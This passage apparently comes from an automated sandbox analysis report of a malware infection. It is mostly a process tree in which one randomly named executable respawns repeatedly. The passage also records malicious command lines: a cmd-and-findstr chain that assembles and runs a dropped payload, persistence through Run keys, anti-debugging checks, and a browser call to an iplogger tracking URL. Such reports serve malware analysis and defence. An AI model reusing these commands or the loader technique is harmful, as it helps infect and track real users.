        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23788
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21840
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:12808
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21100
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:24560
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:24712
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:25500
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6384
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18004
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16944
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:24684
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:25316
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:25104
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:26048
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:24244
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:25856
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:24148
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:26100
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6220
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18848
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:27364
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23228
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:27640
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6580
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18084
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19976
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2132
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:15128
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:26912
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:26596
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:26976
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:27024
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:24964
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:25784
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19796
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:26684
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:25048
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:25768
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23456
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6912
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18752
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:20544
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:6776
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21488
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:26336
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23804
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19784
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16388
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:20288
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18524
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:22180
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:4140
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:25948
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:17864
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:26716
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21576
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:27076
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:4584
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:15568
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18264
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:27472
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:17644
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23732
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16564
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16028
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:27328
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11172
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16440
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9732
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:20892
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:24560
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16076
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19468
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:26612
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9852
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23196
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23684
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5484
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:812
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:21208
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11528
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:24192
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:16512
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:22612
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:12564
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23652
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5748
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8204
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9804
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:24820
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:15572
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18496
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8316
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8316 -s 32
        7⤵
        Program crash
        
        PID:7284
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18672
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:3568
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2096
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:7868
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8408
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:27412
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:4612
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11192
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:9604
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:3080
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:25388
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:25976
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:2092
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:19180
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5660
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:7228
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:772
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11644
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:8708
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:23892
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:4332
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:10888
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:10340
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:26808
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:13132
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 13132 -s 28
        7⤵
        Program crash
        
        PID:19848
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:18488
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:10076
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:17696
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:12032
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:5916
      - C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        
        C:\Users\Admin\Documents\tYLCyuHWzjduCUNrqPcUO6gH.exe
        6⤵
        
        PID:11400
    - - C:\Users\Admin\Documents\KpN3P7O4swhPu0gW9n9rco_F.exe
        
        "C:\Users\Admin\Documents\KpN3P7O4swhPu0gW9n9rco_F.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:5224
      - C:\Windows\SysWOW64\dllhost.exe
        
        dllhost.exe
        6⤵
        
        PID:5804
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Nobile.docm
        6⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        7⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm
        8⤵
        
        PID:3272
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        8⤵
        Runs ping.exe
        
        PID:1880
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
        
        Rimasta.exe.com J
        8⤵
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J
        9⤵
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5288
    - - C:\Users\Admin\Documents\yxyC6_oy3iEx7xfrRLmVhOjV.exe
        
        "C:\Users\Admin\Documents\yxyC6_oy3iEx7xfrRLmVhOjV.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5192
      - C:\Users\Admin\AppData\Local\Temp\{48FF4AAB-8B15-4FD5-88E4-AF7269A78779}\yxyC6_oy3iEx7xfrRLmVhOjV.exe
        
        C:\Users\Admin\AppData\Local\Temp\{48FF4AAB-8B15-4FD5-88E4-AF7269A78779}\yxyC6_oy3iEx7xfrRLmVhOjV.exe /q"C:\Users\Admin\Documents\yxyC6_oy3iEx7xfrRLmVhOjV.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{48FF4AAB-8B15-4FD5-88E4-AF7269A78779}" /IS_temp
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6032
        
        C:\Windows\SysWOW64\MSIEXEC.EXE
        
        "C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\AppData\Local\Downloaded Installations\{8D60AE0D-127A-4D32-BDDE-F3CB1CDCE9CD}\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="yxyC6_oy3iEx7xfrRLmVhOjV.exe"
        7⤵
        Enumerates connected drives
        Suspicious use of FindShellTrayWindow
        
        PID:5680
        
        C:\Users\Admin\AppData\Local\Temp\MSI31A1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\MSI31A1.tmp"
        8⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3496
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Wa9p7
        9⤵
        
        PID:9360
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff86f2046f8,0x7ff86f204708,0x7ff86f204718
        10⤵
        
        PID:10056
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
